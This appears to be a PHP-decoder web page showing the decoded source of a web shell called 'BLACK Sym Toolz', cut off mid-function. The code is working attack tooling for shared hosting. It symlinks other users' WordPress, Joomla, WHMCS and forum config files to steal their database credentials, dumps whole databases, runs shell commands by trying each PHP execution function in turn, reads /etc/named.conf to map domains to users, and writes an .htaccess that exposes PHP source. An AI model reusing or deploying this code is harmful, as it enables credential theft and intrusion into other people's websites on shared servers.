Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // This file is protected by BLACK.JaGuAr $OOO0O0O00=__FILE__;$OOO000000=urldecode(..

Decoded Output download


@set_magic_quotes_runtime(0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);

// Dump Database

if($_GET["action"] == "dumpDB")
{
	$self=$_SERVER["PHP_SELF"];
	if(isset($_COOKIE['dbserver']))
	{
		$date = date("Y-m-d");
		$dbserver = $_COOKIE["dbserver"];
		$dbuser = $_COOKIE["dbuser"];
		$dbpass = $_COOKIE["dbpass"];
		$dbname = $_GET['dbname'];
		$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
		
		$file = "Dump-$dbname-$date";
		
		$file="Dump-$dbname-$date.sql";
		$fp = fopen($file,"w");
		
		function write($data) 
		{
			global $fp;
			
				fwrite($fp,$data);
			
		}
		mysql_connect ($dbserver, $dbuser, $dbpass);
		mysql_select_db($dbname);
		$tables = mysql_query ("SHOW TABLES");
		while ($i = mysql_fetch_array($tables)) 
		{
			$i = $i['Tables_in_'.$dbname];
			$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
			write($create['Create Table'].";");
			$sql = mysql_query ("SELECT * FROM ".$i);
			if (mysql_num_rows($sql)) {
				while ($row = mysql_fetch_row($sql)) {
					foreach ($row as $j => $k) {
						$row[$j] = "'".mysql_escape_string($k)."'";
					}
					write("INSERT INTO $i VALUES(".implode(",", $row).");");
				}
			}
		}
		
		fclose ($fp);
		
		header("Content-Disposition: attachment; filename=" . $file);   
		header("Content-Type: application/download");
		header("Content-Length: " . filesize($file));
		flush();
		
		$fp = fopen($file, "r");
		while (!feof($fp))
		{
			echo fread($fp, 65536);
			flush();
		} 
		fclose($fp); 
	}
}
 function syml($usern,$pdomain)
	{
		symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
		symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
		symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
		symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
		symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
		symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
		symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
		symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
		symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
		symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
		symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
		symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
		symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
		symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
		symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
		symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
		symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
		symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
		symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
		symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
		symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
		symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
		symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
		symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
		symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
		symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
		symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
		symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
		symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
		symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
		symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
		symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
		symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
		symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
		symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
		symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
	}
		
			?>
	
<p align="center"><b>
	<font size="6" face="Times New Roman, Times, serif" color="#3366FF">BLACK</font><font size="6" face="Times New Roman, Times, serif" color="#00CC00">
	</font>
	<font size="6" face="Times New Roman, Times, serif" color="#3366FF">Sym 
Toolz </font>
	<font size="6" face="Times New Roman, Times, serif" color="#800000">V</font><font size="6" face="Times New Roman, Times, serif" color="#3366FF">.</font><font size="6" face="Times New Roman, Times, serif" color="#FFFFFF">1</font><font size="6" face="Times New Roman, Times, serif" color="#3366FF">.</font><font size="6" face="Times New Roman, Times, serif" color="#FFFFFF">0</font></b><font size="6" face="Times New Roman, Times, serif" color="#00CC00"><br>
<head>
    <title>BLACK Sym Toolz</title>
	<link href="http://www.aljyyosh.com/images/ye.gif" rel="shortcut icon">
   
</head>
	
	
		<?php 
		

	
	
	
##################################
function execmd($cmd,$d_functions="None")
{
    if($d_functions=="None") 
	{
		$ret=passthru($cmd); 
		return $ret;
	}
    $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
    $d_functions=str_replace(" ","",$d_functions);
    $dis_funcs=explode(",",$d_functions);
    foreach($funcs as $safe)
    {
        if(!in_array($safe,$dis_funcs)) 
        {
            if($safe=="exec")
            {
                $ret=@exec($cmd);
                $ret=join("
",$ret);
                return $ret;
            }
            elseif($safe=="system")
            {
                $ret=@system($cmd);
                return $ret;
            }
            elseif($safe=="passthru")
            {
                $ret=@passthru($cmd);
                return $ret;
            }
            elseif($safe=="shell_exec")
            {
                $ret=@shell_exec($cmd);
                return $ret;
            }
            elseif($safe=="popen")
            
            
            {
                $cmdpipe=array(
                0=>array('pipe','r'),
                1=>array('pipe','w')
                );
                $resource=@proc_open($cmd,$cmdpipe,$pipes);
                if(@is_resource($resource))
                {
                    while(@!feof($pipes[1]))
                    $ret.=@fgets($pipes[1]);
                    @fclose($pipes[1]);
                    @proc_close($resource);
                    return $ret;
                }
                return -1;
            }
        }
    }
    return -1;
}

	function getDisabledFunctions()
	{
		if(!ini_get('disable_functions'))
		{
			return "None";
		}
		else
		{
				return @ini_get('disable_functions');
		}
	}
	
	function getFilePermissions($file)
{
    
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}


}
	

	
	function odi()
	{
		$od = @ini_get("open_basedir");
		echo $od;
	}
	function phpver()
	{
		$pv=@phpversion();
		echo $pv;
	}
	
	function cip()
	{
		echo $_SERVER["SERVER_NAME"];
	}
	function  safe()
	{
		global $sm;
		return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
	}
	function browse()
	{
		$brow= $_SERVER["HTTP_USER_AGENT"];
		print($brow);
	}
	function serveradmin()
	{
		echo $_SERVER['SERVER_ADMIN'];
	}
	
	
	function curlinfo()
	{
		echo function_exists('curl_version')?("<font color='#3366FF'>Enabled</font>"):("<font color='red'>Disabled</font>");
	}
	
	
	
	function postgresqlinfo()
	{
		echo function_exists('pg_connect')?("<font color='#3366FF'>Enabled</font>"):("<font color='red'>Disabled</font>");
	}
	
	
		
	function HumanReadableFilesize($size)
    {
 
        $mod = 1024;
 
        $units = explode(' ','B KB MB GB TB PB');
        for ($i = 0; $size > $mod; $i++) 
        {
            $size /= $mod;
        }
 
        return round($size, 2) . ' ' . $units[$i];
    }
?>

<?php


$pinfo = "info"; 
if(isset($_GET["com"]))
{
	phpinfo();
}
else
{
$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font color='#3366FF'>ON</font>":"<font color='red'>OFF</font>";
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
?>

		
		<?php 
			$d = str_replace("\",$directorysperator,$dir);
	if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
	$d = str_replace("\","\",$d);
	$dispd = htmlspecialchars($d);
	$pd = $e = explode($directorysperator,substr($d,0,-1));
	$i = 0;
	foreach($pd as $b)
	{
	 $t = '';
	 $j = 0;
	 foreach ($e as $r)
	 {
	  $t.= $r.$directorysperator;
	  if ($j == $i) {break;}
	  $j++;
	 }
	
	
	$href='dir='.$t;
	
	 echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
	 $i++;
	}

		?>
	
<?php

if(isset($_GET['to']) && isset($_GET['file']))
{
     if(!rename($_GET['file'], $_GET['to']))
     {
	 	$loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
		header("Location:$loc");
		ob_end_flush();
       
     }
     else
     {
	 	$loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
		header("Location:$loc");
		ob_end_flush();
        
     }
}

	
	
	
$setuploadvalue = 0;



	
	
	
	?>
	
	
		
	
			<body bgcolor="#000000">
			

<?php

	{
	?>
		<center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver"><font color="#3366FF" size="4">| Get Domains |</font></a></td>
		<td><a href="<?php echo $self; ?>?users&symlinkserver"><font color="#3366FF" size="4">| Users & Domains |</font></a></td>
		<td><a href="<?php echo $self; ?>?symlink&symlinkserver"><font color="#3366FF" size="4">| Symlink Server |</font></a></td>
		<td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver"><font color="#3366FF" size="4">| Symlink File |</font></a></td>
		<td><a href="<?php echo $self; ?>?script&symlinkserver"><font color="#3366FF" size="4">| Config Locator |</font></a></td>
		</tr></table></center><br>
<?php

	if(isset($_GET["domains"])) 
		{
		?>	<center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center>
		<?php }
		else if(isset($_GET["users"])) 
		{
			$d0mains = @file("/etc/named.conf");

			if(!$d0mains)
			{ 
				die("<center><font size=4 color=red>cannot ReaD -> [ /etc/named.conf ]</font><center>"); 
			}
			
			$url = 'http://'.$_SERVER['SERVER_NAME'];
			
			echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td></tr>";
			
			foreach($d0mains as $d0main)
			{
				if(eregi("zone",$d0main))
				{
					preg_match_all('#zone "(.*)"#', $d0main, $domains);
					flush();
					
					if(strlen(trim($domains[1][0])) > 2)
					{ 
						$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
																		
						echo "<tr><td><a href=http://www.".$domains[1][0]."/><font size=3 color=#0066FF>".$domains[1][0]."</font></a></td><td><font size=3 color=#0066FF>" . $user['name']. "</font></td></tr>"; 
						flush();
			
					}
				}
			}
			echo "</table>";
		}
		else if(isset($_GET["symlink"])) 
		{
			$d0mains = @file("/etc/named.conf");
	
			if($d0mains)
			{ 
		     	@mkdir("BJ",0777);
				@chdir("BJ");
				execmd("ln -s / root");
				$file3 = 'Options all 
	 DirectoryIndex Sux.html 
	 AddType text/plain .php 
	 AddHandler server-parsed .php 
	  AddType text/plain .html 
	 AddHandler txt .html 
	 Require None 
	 Satisfy Any        
	';
				$fp3 = fopen('.htaccess','w');
				$fw3 = fwrite($fp3,$file3);
				@fclose($fp3);
						echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
					
				foreach($d0mains as $d0main)
				{
					if(eregi("zone",$d0main))
					{
						preg_match_all('#zone "(.*)"#', $d0main, $domains);
						flush();
							
						if(strlen(trim($domains[1][0])) > 2)
						{ 
							$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
								
							flush();
							
$site = $user['name'] ;


@symlink("/","BJ/root");

$site = $domains[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domains[1][0]) or preg_match("/.^$il/",$domains[1][0]) )
{
